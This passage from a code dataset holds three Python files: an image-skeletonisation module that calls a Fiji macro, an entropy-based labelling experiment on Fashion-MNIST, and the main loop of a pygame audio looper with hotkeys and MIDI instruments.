dilated.astype(np.uint8), connectivity=8\r\n )\r\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\r\n # the following part is just taking out the background which is also considered a component, but most of the time we don't want that.\r\n sizes = stats[1:, -1]\r\n nb_components = nb_components - 1\r\n\r\n # minimum size of particles we want to keep (number of pixels)\r\n # here, it's a fixed value, but you can set it as you want, eg the mean of the sizes or whatever\r\n min_size = 4000\r\n\r\n # your answer image\r\n img2 = np.zeros((dilated.shape))\r\n # for every component in the image, you keep it only if it's above min_size\r\n for i in range(0, nb_components):\r\n if sizes[i] >= min_size:\r\n img2[output == i + 1] = 1\r\n skeletonized = cv2.ximgproc.thinning(np.array(255 * img2, dtype=np.uint8))\r\n nx_g = generate_nx_graph(\r\n from_sparse_to_graph(scipy.sparse.dok_matrix(skeletonized))\r\n )\r\n g, pos = nx_g\r\n tips = [node for node in g.nodes if g.degree(node) == 1]\r\n dilated_bis = np.copy(img2)\r\n for tip in tips:\r\n branch = np.array(\r\n orient(g.get_edge_data(*list(g.edges(tip))[0])[\"pixel_list\"], pos[tip])\r\n )\r\n orientation = branch[0] - branch[min(branch.shape[0] - 1, 20)]\r\n orientation = orientation / (np.linalg.norm(orientation))\r\n window = 20\r\n x, y = pos[tip][0], pos[tip][1]\r\n if (\r\n x - window >= 0\r\n and x + window < dilated.shape[0]\r\n and y - window >= 0\r\n and y + window < dilated.shape[1]\r\n ):\r\n shape_tip = dilated[x - window : x + window, y - window : y + window]\r\n # dist = 20\r\n for i in range(dist):\r\n pixel = (pos[tip] + orientation * i).astype(int)\r\n xp, yp = pixel[0], pixel[1]\r\n if (\r\n xp - window >= 0\r\n and xp + window < dilated.shape[0]\r\n and yp - window 
>= 0\r\n and yp + window < dilated.shape[1]\r\n ):\r\n dilated_bis[\r\n xp - window : xp + window, yp - window : yp + window\r\n ] += shape_tip\r\n dilation = cv2.dilate(dilated_bis.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv2.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.erode(\r\n dilation.astype(np.uint8) * 255, kernel, iterations=2\r\n ) # recent addition for agg, careful\r\n return dilation\r\n\r\n\r\ndef make_back_sub(directory, dirname, op_id):\r\n a_file = open(\r\n f\"{path_code}pipeline/scripts/stitching_loops/background_substract.ijm\", \"r\"\r\n )\r\n\r\n list_of_lines = a_file.readlines()\r\n\r\n list_of_lines[4] = f\"mainDirectory = \\u0022{directory}\\u0022 ;\\n\"\r\n list_of_lines[29] = f\"\\t if(startsWith(list[i],\\u0022{dirname}\\u0022)) \\u007b\\n\"\r\n file_name = f\"{temp_path}/stitching_loops/background_substract{op_id}.ijm\"\r\n a_file = open(file_name, \"w\")\r\n\r\n a_file.writelines(list_of_lines)\r\n\r\n a_file.close()\r\n\r\n\r\ndef run_back_sub(directory, folder):\r\n op_id = time_ns()\r\n make_back_sub(directory, folder, op_id)\r\n command = [\r\n fiji_path,\r\n \"--mem=8000m\",\r\n \"--headless\",\r\n \"--ij2\",\r\n \"--console\",\r\n \"-macro\",\r\n f'{os.getenv(\"TEMP\")}/stitching_loops/background_substract{op_id}.ijm',\r\n ]\r\n subprocess.run(command, stdout=subprocess.DEVNULL)\r\n","sub_path":"amftrack/pipeline/functions/image_processing/extract_skel.py","file_name":"extract_skel.py","file_ext":"py","file_size_in_byte":12655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282191077","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom math import isnan\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom keras.datasets import fashion_mnist\nimport itertools\nimport codecs\n\n# import warnings filter\nfrom warnings import simplefilter\n# ignore all future warnings\nsimplefilter(action = 'ignore', category = FutureWarning)\n\ndef factorial(n):\n if n == 0:\n return 1\n elif n > 0:\n return n*factorial(n - 1)\n else:\n print(\"sth wrong\")\n \n# entropy labelling\ndef shannon_label(probas, s_cls):\n info_con = (-1)*np.log2(probas)\n # entropy\n Hp = np.sum(np.multiply(probas, info_con))\n if isnan(Hp):\n labels = [s_cls[np.argmax(probas)]]\n else:\n labels = [s_cls[i] for i, Ipk in enumerate(info_con) if Ipk <= Hp]\n return labels\n\n# labelling and evaluating them\ndef shannon_scls_eval(classes, orig_A, lim_A):\n s_cls = classes\n\n # extract dataset of chosen classes\n trn_imgs = [img for i, img in enumerate(train_imgs) if train_labels[i] in s_cls]\n trn_labels = [label for label in train_labels if label in s_cls]\n tst_imgs = [img for i, img in enumerate(test_imgs) if test_labels[i] in s_cls]\n tst_labels = [label for label in test_labels if label in s_cls]\n\n # generate an annotator\n a1_model = LR().fit(trn_imgs[:orig_A], trn_labels[:orig_A])\n a1_proba = a1_model.predict_proba(trn_imgs[orig_A:orig_A + lim_A])\n\n # entropy labelling\n mul_labels = [shannon_label(probas, s_cls) for probas in a1_proba]\n \n # dump generated labels and original true labels\n print(\"generated labels and original labels\", sep = \"\\n\", file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n print(mul_labels, sep = \"\\n\", file = 
codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n print(trn_labels[orig_A:orig_A + lim_A], sep = \"\\n\", file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n \n # labels score evaluation\n score = 0\n for labels, t_label in zip(mul_labels, trn_labels[orig_A:orig_A + lim_A]):\n for l in labels:\n if (l == t_label):\n score += 1\n\n m_labels = []\n for labels in mul_labels:\n [m_labels.append(l) for l in labels] \n \n return (len(m_labels)/lim_A, score*100/len(m_labels))\n\n# loading MNIST\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\ntrain_imgs = np.array([x.ravel() for x in train_images])\ntest_imgs = np.array([y.ravel() for y in test_images])\n\nimg_SIZE = train_images.shape[1]*train_images.shape[2]\n\n# main experiment\nclasses = [i for i in range(10)]\norig_A1, lim_A1 = 2000, 2000\n\nfact_10 = factorial(10)\n\nevals = []\nfor i in range(10, 11): # i: num of sub-classes\n a, b = 0, 0\n if (i == 10):\n sample_lnum, sample_lqual = shannon_scls_eval(classes, orig_A1, lim_A1)\n evals.append((sample_lnum, sample_lqual))\n else:\n combi_ni = fact_10//(factorial(i)*factorial(10 - i))\n for scls in itertools.combinations(classes, i):\n sample_lnum, sample_lqual = shannon_scls_eval(list(scls), orig_A1, lim_A1)\n a += sample_lnum\n b += sample_lqual\n evals.append((a/combi_ni, b/combi_ni))\nprint(\"labels evaluation\", sep = '\\n', file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\nprint(evals, sep = '\\n', file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n","sub_path":"final_experiments/Shannon_fashion-mnist.py","file_name":"Shannon_fashion-mnist.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575297020","text":"from multiprocessing import Process\nimport pygame\nimport os\nimport shutil\nimport pygame.midi\nimport numpy as np\nimport time\nfrom area import Area\nimport looperAreas\nimport drawing as draw\nimport keyboard\nimport utils\nfrom utils import interpolate\nimport hotkeys\nimport sounddevice as sd\nimport customevents as events\nfrom wire import Wire\nfrom metronome import Metronome\nfrom track import Track\nfrom tonearm import Tonearm\nfrom loopDefault import LoopDefault\nfrom console import Console\nimport globalSettings as settings\nfrom listOfCommandsWide import ListOfCommandsWide\nfrom listOfDevicesWide import ListOfDevicesWide\nimport processor\nfrom soundbank import Soundbank\nfrom samplesController import SamplesController\nfrom samplesPanelWide import SamplesPanelWide\nfrom midiController import MidiController \nfrom midiPiano import MidiPiano\nfrom midiPads import MidiPads\nimport autoplayController as autoplay\nimport timeSynchronization as sync\n\n\"\"\" Main Loop \"\"\"\nstreamTimeStart = 0\nkeyboardMap = []\n_suspitiousFunctionKeysLag = 10\n\ndef selectArea(areaname):\n if not areaname in areas:\n return\n currentArea = areaname\n\nmarginTop = 1\n\n#TODO: возможность выбора устройств\nwire = Wire(inputDevice = 8, outputDevice = 8)\nif (sd.query_devices(wire.inputDevice)['name'] != 'Yamaha Steinberg USB ASIO'):\n raise Exception('NOPE! 
' + sd.query_devices(wire.inputDevice)['name'])\nwireTempData = {\n 'audio': [],\n 'cursor': 0,\n 'midi-audio': []\n}\n\n\nmetronome = Metronome(120, left = 16, top = marginTop)\ntracks = [\n Track(0, LoopDefault, 1, marginTop),\n Track(1, LoopDefault, 2, marginTop),\n Track(2, LoopDefault, 3, marginTop),\n Track(3, LoopDefault, 4, marginTop),\n Track(4, LoopDefault, 6, marginTop),\n Track(5, LoopDefault, 7, marginTop),\n Track(6, LoopDefault, 8, marginTop),\n Track(7, LoopDefault, 9, marginTop),\n Track(8, LoopDefault, 11, marginTop),\n Track(9, LoopDefault, 12, marginTop),\n Track(10, LoopDefault, 13, marginTop),\n Track(11, LoopDefault, 14, marginTop),]\ntonearmA = Tonearm(size = 16, left = 5, top = marginTop)\ntonearmB = Tonearm(size = 16, left = 10, top = marginTop)\nclock = pygame.time.Clock()\nconsole = Console(1, 27, 32)\nsoundbank = Soundbank()\nsampler = SamplesController(soundbank)\nsamplesControlPanel = SamplesPanelWide(sampler)\nmidi = MidiController(sampler)\n\n\n\"\"\"Wides\"\"\"\nlistOfCommandsWide = ListOfCommandsWide()\nlistOfDevicesWide = ListOfDevicesWide()\ncurrentWide = None\ncurrentSide = None\n\ndef start(): \n global metronome\n global soundbank\n\n bpmChanged(metronome.bpm)\n wire.start(callback = wireCallback) \n draw.setNewFont('open-sans', 'open-sans 12')\n draw.setDefaultFont('open-sans')\n metronome.redraw()\n console.redraw()\n autoplay.setSubscribers([midi, sampler])\n\ndef update():\n ticks = pygame.time.get_ticks()\n for track in tracks:\n track.update()\n metronome.update()\n draw.update()\n\n global _suspitiousFunctionKeysLag\n _suspitiousFunctionKeysLag -= 1\n\ndef close():\n wire.stop()\n print('stop!')\n\ndef load(foldername):\n global console\n\n path = 'saves/' + foldername\n if not os.path.exists(path):\n return\n\n dict = utils.readSaveFile(path + '/app.save')\n wide = dict['current_wide']\n side = dict['current_side']\n\n soundbank.savesLoad(path, console)\n sampler.load(path, console)\n midi.load(path, console)\n\n if wide != None:\n data = wide.split(' ')\n if data[0] == 'midiPiano':\n n = data[1]\n console.emulate(interpolate('piano {n}'))\n\n if side != None:\n data = side.split(' ')\n if data[0] == 'midiPads':\n n = data[1]\n console.emulate(interpolate('pads {n}'))\n\n for track in tracks:\n track.load(path, console)\n\ndef save(foldername):\n path = 'saves/' + foldername\n if not os.path.exists(path):\n os.mkdir(path)\n os.mkdir(path + '/samples')\n for filename in os.listdir(path):\n filepath = os.path.join(path, filename)\n try:\n if os.path.isfile(filepath) or os.path.islink(filepath):\n os.unlink(filepath)\n elif os.path.isdir(filepath):\n shutil.rmtree(filepath)\n except Exception as e:\n print('Failed to delete %s. 
Reason: %s' % (filepath, e))\n\n global currentWide\n global currentSide\n cwide = currentWide.getSaveName() if currentWide != None else 'None'\n cside = currentSide.getSaveName() if currentSide != None else 'None'\n file = open(path + '/app.save', 'w+')\n file.write(interpolate('current_wide: {cwide}\\n'))\n file.write(interpolate('current_side: {cside}\\n'))\n file.close()\n\n soundbank.savesSave(path)\n sampler.save(path)\n midi.save(path)\n\n for track in tracks:\n track.save(path)\n\ndef tick(): \n tonearmA.update()\n tonearmB.update()\n\ndef wireCallback(indata, outdata, frames, timeinfo, status):\n global wireTempData\n global streamTimeStart\n outdata[:] = indata\n\n mask, fromSamples, fromSamplesSum = sampler.read(frames)\n\n wireTempData['audio'] = indata\n wireTempData['midi-audio'] = [[]] * 16\n for i in range(0, len(mask)):\n if mask[i]:\n wireTempData['midi-audio'][i] = fromSamples[i]\n\n if streamTimeStart == 0:\n streamTimeStart = timeinfo.inputBufferAdcTime\n elapsed = timeinfo.inputBufferAdcTime - streamTimeStart\n\n for track in tracks:\n if track.canWrite():\n #data = processor.stereoToMono(indata, 1)\n track.write(wireTempData, elapsed, frames = frames, samplerate = settings.samplerate)\n if track.canRead():\n read = track.read(elapsed, frames = frames, samplerate = settings.samplerate) \n data = processor.monoToStereo(read)\n outdata += reshapeSound(data, outdata.shape)\n \"\"\" \n TODO: smooth\n track.fade(indata, elapsed, frames = frames)\n \"\"\"\n read = metronome.readSound(frames)\n outdata += reshapeSound(read, outdata.shape)\n outdata += reshapeSound(processor.monoToStereo(fromSamplesSum), outdata.shape)\n\n tonearmA.moveBy(frames, metronome.bpm, samplerate = settings.samplerate)\n tonearmB.moveBy(frames, metronome.bpm, samplerate = settings.samplerate)\n metronome.moveBy(frames, samplerate = settings.samplerate)\n\n sync.move(frames)\n autoplay.move(frames)\n\ndef samplerateChanged(rate):\n for track in tracks:\n track.resetMemory(samplerate = settings.samplerate)\n tonearmA.resetSize(metronome.bpm, samplerate = settings.samplerate)\n tonearmB.resetSize(metronome.bpm, samplerate = settings.samplerate)\n\ndef reshapeSound(sound, shape):\n if sound.shape[0] != shape[0]:\n sound = np.resize(sound, [shape[0], shape[1]])\n return sound\n\ndef loadTapesFromFolder(path):\n for file in os.listdir('samples/' + path):\n if file.endswith(\".wav\") or file.endswith(\".mp3\"):\n names = ['track' + str(x + 1) for x in range(0, 12)]\n name = os.path.basename(file.split('.')[0])\n if name in names:\n n = int(name[5:]) - 1\n sound = processor.stereoToMono(soundbank.readDataFromFile(path +'/' + file)[0], 0)\n tracks[n].writeFiledata(sound)\n\ndef mainTabbed(event):\n looperAreas.changeArea('side')\n\ndef sideTabbed(event):\n looperAreas.changeArea('wide')\n\ndef wideTabbed(event):\n def lmbd():\n console.activate()\n if \"deactivate\" in dir(currentWide):\n currentWide.deactivate()\n looperAreas.changeArea('console', func = lmbd)\n\ndef consoleTabbed(event):\n looperAreas.changeArea('main', func = lambda: console.deactivate())\n\ndef mainReTabbed():\n looperAreas.changeArea('console')\n\ndef sideReTabbed():\n looperAreas.changeArea('main')\n\ndef wideReTabbed():\n looperAreas.changeArea('side', func = lambda: console.activate())\n\ndef consoleReTabbed():\n looperAreas.changeArea(\n 'wide',\n func = lambda: console.deactivate())\n\ndef playTrack(n, e):\n if keyboard.is_pressed('space'):\n return\n if keyboard.is_pressed('s'):\n return\n if _suspitiousFunctionKeysLag < 0:\n 
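# ----------------------------------------------------------------------------
# Note on reshapeSound above: np.resize repeats the source samples when the
# chunk is shorter than the output block, which is audible as a glitch in an
# audio callback. A hedged alternative (my naming, not the record's) that
# zero-pads or truncates instead:
import numpy as np

def fit_to_block(sound, shape):
    out = np.zeros(shape, dtype=sound.dtype)
    rows = min(shape[0], sound.shape[0])
    cols = min(shape[1], sound.shape[1])
    out[:rows, :cols] = sound[:rows, :cols]   # copy what fits, pad with silence
    return out

block = fit_to_block(np.ones((100, 2)), (128, 2))
print(block.shape, block.sum())               # (128, 2) 200.0
# ----------------------------------------------------------------------------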
tracks[n].togglePlay()\n\ndef bpmChanged(bpm):\n for track in tracks:\n track.setBpm(bpm)\n track.resetMemory(samplerate = settings.samplerate)\n tonearmA.resetSize(bpm, samplerate = settings.samplerate)\n tonearmB.resetSize(bpm, samplerate = settings.samplerate)\n autoplay.updateBpm(bpm, samplerate = settings.samplerate)\n sync.onBpmChanged(bpm, samplerate = settings.samplerate)\n\ndef processConsoleCommand(event):\n console.processCommand()\n\ndef bPressed(event):\n metronome.toggle()\n\ndef setBpmPressed():\n metronome.configureBpm()\n\ndef digitPressed(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n metronome.inputBpmDigit(int(event.name))\n\ndef arrowUpPressed(event):\n for track in tracks:\n track.decreaseSize()\n\ndef arrowDownPressed(event):\n for track in tracks:\n track.increaseSize()\n\ndef backspacePressed(event): \n metronome.backspaceBpmDigit()\n\ndef enterPressed(event):\n metronome.confirm()\n for track in tracks:\n track.confirm()\n\ndef spacePressed(event):\n metronome.confirm()\n for track in tracks:\n track.confirm()\n\ndef escPressed(event):\n metronome.cancel()\n for track in tracks:\n track.cancel()\n\ndef wideEsc(event):\n if \"escPressed\" in dir(currentWide):\n currentWide.escPressed() \n\ndef wideEnter(event):\n if \"enterPressed\" in dir(currentWide):\n currentWide.enterPressed() \n\ndef wideRight(event):\n if \"rightPressed\" in dir(currentWide):\n currentWide.rightPressed()\n\ndef wideLeft(event):\n if \"leftPressed\" in dir(currentWide):\n currentWide.leftPressed()\n\ndef wideUp(event):\n if \"upPressed\" in dir(currentWide):\n currentWide.upPressed()\n\ndef wideDown(event):\n if \"downPressed\" in dir(currentWide):\n currentWide.downPressed()\n\ndef wideDigit(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n if \"digitPressed\" in dir(currentWide):\n currentWide.digitPressed(int(event.name))\n\ndef wideA(event):\n if \"aPressed\" in dir(currentWide):\n currentWide.aPressed()\n\ndef wideB(event):\n if \"bPressed\" in dir(currentWide):\n currentWide.bPressed()\n\ndef wideC(event):\n if \"cPressed\" in dir(currentWide):\n currentWide.cPressed()\n\ndef wideD(event):\n if \"dPressed\" in dir(currentWide):\n currentWide.dPressed()\n\ndef wideR(event):\n if \"rPressed\" in dir(currentWide):\n currentWide.rPressed()\n\ndef sideEnter(event):\n if \"enterPressed\" in dir(currentSide):\n currentSide.enterPressed() \n\ndef sideRight(event):\n if \"rightPressed\" in dir(currentSide):\n currentSide.rightPressed()\n\ndef sideLeft(event):\n if \"leftPressed\" in dir(currentSide):\n currentSide.leftPressed()\n\ndef sideUp(event):\n if \"upPressed\" in dir(currentSide):\n currentSide.upPressed()\n\ndef sideDown(event):\n if \"downPressed\" in dir(currentSide):\n currentSide.downPressed()\n\ndef sideDigit(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n if \"digitPressed\" in dir(currentSide):\n currentSide.digitPressed(int(event.name))\n\ndef sideA(event):\n if \"aPressed\" in dir(currentSide):\n currentSide.aPressed()\n\ndef sideB(event):\n if \"bPressed\" in dir(currentSide):\n 
currentSide.bPressed()\n\ndef sideC(event):\n if \"cPressed\" in dir(currentSide):\n currentSide.cPressed()\n\ndef sideD(event):\n if \"dPressed\" in dir(currentSide):\n currentSide.dPressed()\n\ndef sideR(event):\n if \"rPressed\" in dir(currentSide):\n currentSide.rPressed()\n\ndef consoleKeyboardInput(key):\n console.input(key)\n\ndef prevCommand(event):\n console.input('prev')\n\ndef nextCommand(event):\n console.input('next')\n\nhotkeys.simple('b', bPressed, \"main\")\nhotkeys.simple('tab', mainTabbed, \"main\")\nhotkeys.simple('tab', sideTabbed, \"side\")\nhotkeys.simple('tab', wideTabbed, \"wide\")\nhotkeys.simple('tab', consoleTabbed, \"console\")\nhotkeys.add('s + b', setBpmPressed, \"main\")\n\nhotkeys.simple('1', digitPressed, \"main\")\nhotkeys.simple('2', digitPressed, \"main\")\nhotkeys.simple('3', digitPressed, \"main\")\nhotkeys.simple('4', digitPressed, \"main\")\nhotkeys.simple('5', digitPressed, \"main\")\nhotkeys.simple('6', digitPressed, \"main\")\nhotkeys.simple('7', digitPressed, \"main\")\nhotkeys.simple('8', digitPressed, \"main\")\nhotkeys.simple('9', digitPressed, \"main\")\nhotkeys.simple('0', digitPressed, \"main\")\nhotkeys.simple('up', arrowUpPressed, \"main\")\nhotkeys.simple('down', arrowDownPressed, \"main\")\n\nhotkeys.add('s + f1', tracks[0].toggleChangeSize, \"main\")\nhotkeys.add('s + f2', tracks[1].toggleChangeSize, \"main\")\nhotkeys.add('s + f3', tracks[2].toggleChangeSize, \"main\")\nhotkeys.add('s + f4', tracks[3].toggleChangeSize, \"main\")\nhotkeys.add('s + f5', tracks[4].toggleChangeSize, \"main\")\nhotkeys.add('s + f6', tracks[5].toggleChangeSize, \"main\")\nhotkeys.add('s + f7', tracks[6].toggleChangeSize, \"main\")\nhotkeys.add('s + f8', tracks[7].toggleChangeSize, \"main\")\nhotkeys.add('s + f9', tracks[8].toggleChangeSize, \"main\")\nhotkeys.add('s + f10', tracks[9].toggleChangeSize, \"main\")\nhotkeys.add('s + f11', tracks[10].toggleChangeSize, \"main\")\nhotkeys.add('s + f12', tracks[11].toggleChangeSize, \"main\")\n\nhotkeys.add('space + f1', tracks[0].toggleRecord, \"main\")\nhotkeys.add('space + f2', tracks[1].toggleRecord, \"main\")\nhotkeys.add('space + f3', tracks[2].toggleRecord, \"main\")\nhotkeys.add('space + f4', tracks[3].toggleRecord, \"main\")\nhotkeys.add('space + f5', tracks[4].toggleRecord, \"main\")\nhotkeys.add('space + f6', tracks[5].toggleRecord, \"main\")\nhotkeys.add('space + f7', tracks[6].toggleRecord, \"main\")\nhotkeys.add('space + f8', tracks[7].toggleRecord, \"main\")\nhotkeys.add('space + f9', tracks[8].toggleRecord, \"main\")\nhotkeys.add('space + f10', tracks[9].toggleRecord, \"main\")\nhotkeys.add('space + f11', tracks[10].toggleRecord, \"main\")\nhotkeys.add('space + f12', tracks[11].toggleRecord, \"main\")\n\nhotkeys.simple('f1', lambda e: playTrack(0, e), \"main\")\nhotkeys.simple('f2', lambda e: playTrack(1, e), \"main\")\nhotkeys.simple('f3', lambda e: playTrack(2, e), \"main\")\nhotkeys.simple('f4', lambda e: playTrack(3, e), \"main\")\nhotkeys.simple('f5', lambda e: playTrack(4, e), \"main\")\nhotkeys.simple('f6', lambda e: playTrack(5, e), \"main\")\nhotkeys.simple('f7', lambda e: playTrack(6, e), \"main\")\nhotkeys.simple('f8', lambda e: playTrack(7, e), \"main\")\nhotkeys.simple('f9', lambda e: playTrack(8, e), \"main\")\nhotkeys.simple('f10', lambda e: playTrack(9, e), \"main\")\nhotkeys.simple('f11', lambda e: playTrack(10, e), \"main\")\nhotkeys.simple('f12', lambda e: playTrack(11, e), \"main\")\n\nhotkeys.simple('backspace', backspacePressed, \"main\")\nhotkeys.simple('enter', enterPressed, 
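# ----------------------------------------------------------------------------
# The wide*/side* handlers above all repeat the same guard:
#     if "xPressed" in dir(obj): obj.xPressed()
# getattr with a default expresses that duck-typed dispatch in one helper
# (names here are illustrative, not from the record):
def forward(target, method, *args):
    fn = getattr(target, method, None)
    if callable(fn):
        fn(*args)

class Panel:
    def upPressed(self):
        print("up!")

panel = Panel()
forward(panel, "upPressed")     # prints "up!"
forward(panel, "downPressed")   # missing handler is silently skipped
# ----------------------------------------------------------------------------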
\"main\")\nhotkeys.simple('space', spacePressed, \"main\")\nhotkeys.simple('esc', escPressed, \"main\")\n\nhotkeys.simple('enter', sideEnter, \"side\")\nhotkeys.simple('right', sideRight, \"side\")\nhotkeys.simple('left', sideLeft, \"side\")\nhotkeys.simple('up', sideUp, \"side\")\nhotkeys.simple('down', sideDown, \"side\")\nhotkeys.simple('1', sideDigit, \"side\")\nhotkeys.simple('2', sideDigit, \"side\")\nhotkeys.simple('3', sideDigit, \"side\")\nhotkeys.simple('4', sideDigit, \"side\")\nhotkeys.simple('5', sideDigit, \"side\")\nhotkeys.simple('6', sideDigit, \"side\")\nhotkeys.simple('7', sideDigit, \"side\")\nhotkeys.simple('8', sideDigit, \"side\")\nhotkeys.simple('9', sideDigit, \"side\")\nhotkeys.simple('0', sideDigit, \"side\")\nhotkeys.simple('a', sideA, \"side\")\nhotkeys.simple('b', sideB, \"side\")\nhotkeys.simple('c', sideC, \"side\")\nhotkeys.simple('d', sideD, \"side\")\nhotkeys.simple('r', sideR, \"side\")\n\nhotkeys.simple('esc', wideEsc, \"wide\")\nhotkeys.simple('enter', wideEnter, \"wide\")\nhotkeys.simple('right', wideRight, \"wide\")\nhotkeys.simple('up', wideUp, \"wide\")\nhotkeys.simple('down', wideDown, \"wide\")\nhotkeys.simple('left', wideLeft, \"wide\")\nhotkeys.simple('1', wideDigit, \"wide\")\nhotkeys.simple('2', wideDigit, \"wide\")\nhotkeys.simple('3', wideDigit, \"wide\")\nhotkeys.simple('4', wideDigit, \"wide\")\nhotkeys.simple('5', wideDigit, \"wide\")\nhotkeys.simple('6', wideDigit, \"wide\")\nhotkeys.simple('7', wideDigit, \"wide\")\nhotkeys.simple('8', wideDigit, \"wide\")\nhotkeys.simple('9', wideDigit, \"wide\")\nhotkeys.simple('0', wideDigit, \"wide\")\nhotkeys.simple('a', wideA, \"wide\")\nhotkeys.simple('b', wideB, \"wide\")\nhotkeys.simple('c', wideC, \"wide\")\nhotkeys.simple('d', wideD, \"wide\")\nhotkeys.simple('r', wideR, \"wide\")\n\nhotkeys.processText(consoleKeyboardInput, \"console\")\nhotkeys.simple('enter', processConsoleCommand, \"console\")\nhotkeys.simple('up', prevCommand, \"console\")\nhotkeys.simple('down', nextCommand, \"console\")\n\ndef main():\n global currentWide\n global currentSide\n global midi\n\n pygame.init()\n pygame.midi.init()\n midi.initDevices()\n draw.init(34, 30)\n logo = pygame.image.load(\"Г. Мясоедов Осеннее утро. 
1893.jpg\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Looper\")\n \n screen = pygame.display.set_mode((draw.cw * draw.width, draw.height * draw.ch))\n screen.set_alpha(None)\n draw.setCanvas(screen)\n \n running = True\n\n start()\n \n # main loop\n while running: \n clock.tick(60)\n midi.update()\n update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n close()\n running = False\n elif events.check(event, 'EMULATE_CONSOLE'):\n console.emulate(event.dict['command'])\n elif events.check(event, 'BPM_CHANGED'):\n bpmChanged(event.dict['bpm'])\n elif events.check(event, 'BPM_TICK'):\n beat = event.dict['beat']\n tick()\n for track in tracks:\n track.onBeat()\n if (beat % 4) == 0:\n track.onBar()\n if (beat % 16) == 0:\n track.onGlobalLoop()\n sampler.cleanUp()\n autoplay.onBeat()\n elif events.check(event, 'BPM_HALF_TICK'):\n beat = event.dict['beat']\n for track in tracks:\n track.onHalfBeat()\n elif events.check(event, 'DEMAND_CHANGE_BPM'):\n metronome.setBpm(event.dict['value'])\n elif events.check(event, 'DEMAND_CHANGE_TRACK_SIZE'):\n tracks[event.dict['n']].setSize(event.dict['length'])\n elif events.check(event, 'DEMAND_CHANGE_SAMPLERATE'):\n settings.samplerate = event.dict['value']\n samplerateChanged(event.dict['value'])\n elif events.check(event, 'SHOW_LIST_OF_COMMANDS'):\n currentWide = listOfCommandsWide \n currentWide.redrawTitle()\n listOfCommandsWide.setCommands(event.dict['commands'])\n listOfCommandsWide.redraw()\n elif events.check(event, 'SHOW_LIST_OF_DEVICES'):\n currentWide = listOfDevicesWide\n currentWide.redrawTitle()\n listOfDevicesWide.redraw()\n elif events.check(event, 'LOAD_FOLDER'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n soundbank.loadFolder(event.dict['path'])\n elif events.check(event, 'LOAD_BANK'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n soundbank.loadBankFromFolder(event.dict['path'], event.dict['bank'])\n elif events.check(event, 'LOAD_TAPES'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n loadTapesFromFolder(event.dict['path'])\n elif events.check(event, 'UPDATE_SAMPLE'):\n sampler.updateSample(event.dict['name'])\n elif events.check(event, 'WIRE_MIDI'):\n midi.wireChannel(event.dict['instrument'], event.dict['device'])\n elif events.check(event, 'CREATE_INSTRUMENT'):\n type = event.dict['type']\n n = event.dict['n'] \n widecreated = False\n sidecreated = False\n\n if not midi.isChannelUsed(n):\n if type == 'piano': \n piano = MidiPiano(n, sampler)\n currentWide = piano\n widecreated = True\n elif type == 'pads':\n pads = MidiPads(n, sampler)\n currentSide = pads\n sidecreated = True\n else:\n console.print('no such type of instrument')\n \n if widecreated: \n midi.appendChannel(n, currentWide)\n currentWide.redrawTitle()\n currentWide.initDraw()\n currentWide.redraw()\n if sidecreated: \n midi.appendChannel(n, currentSide)\n currentSide.redrawTitle()\n currentSide.initDraw()\n currentSide.redraw()\n else:\n if midi.instruments[n].getType() == type:\n if type == 'piano':\n currentWide = midi.instruments[n]\n currentWide.redrawTitle()\n currentWide.initDraw()\n currentWide.redraw()\n if type == 'pads':\n currentSide = midi.instruments[n]\n currentSide.redrawTitle()\n currentSide.initDraw()\n currentSide.redraw()\n console.print('channel already exists. 
now displayed')\n else:\n console.print('channel is used')\n elif events.check(event, 'SAVE'):\n save(event.dict['name'])\n elif events.check(event, 'LOAD'):\n load(event.dict['name'])\n elif events.check(event, 'LOAD_INSTRUMENT'):\n if midi.instruments[event.dict['n']] == None and (not 'repeats' in event.dict or event.dict['repeats'] < 10000):\n repeats = events.dict['repeats'] if 'repeats' in event.dict else 10000\n events.emit('LOAD_INSTRUMENT', {'n': events.dict['n'], 'filename': events.dict['filename'], 'repeats': repeats})\n elif 'repeats' in event.dict and event.dict['repeats'] >= 10000:\n print('MANY REPEATS for LOAD_INSTRUMENT')\n else:\n midi.instruments[event.dict['n']].load(event.dict['filename'], console)\n elif events.check(event, 'SHOW_SAMPLER'):\n currentWide = samplesControlPanel\n currentWide.redrawTitle()\n currentWide.redraw()\n elif events.check(event, 'REDRAW_PIANO'):\n if currentWide.getType() == 'piano':\n step = event.dict['step']\n if step == 1:\n currentWide.redrawStep1()\n if step == 2:\n currentWide.redrawStep2()\n if step == 3:\n currentWide.redrawStep3()\n if step == 4:\n currentWide.redrawStep4()\n if step == 5:\n currentWide.redrawStep5()\n elif events.check(event, 'DISABLE_INSTRUMENT'):\n 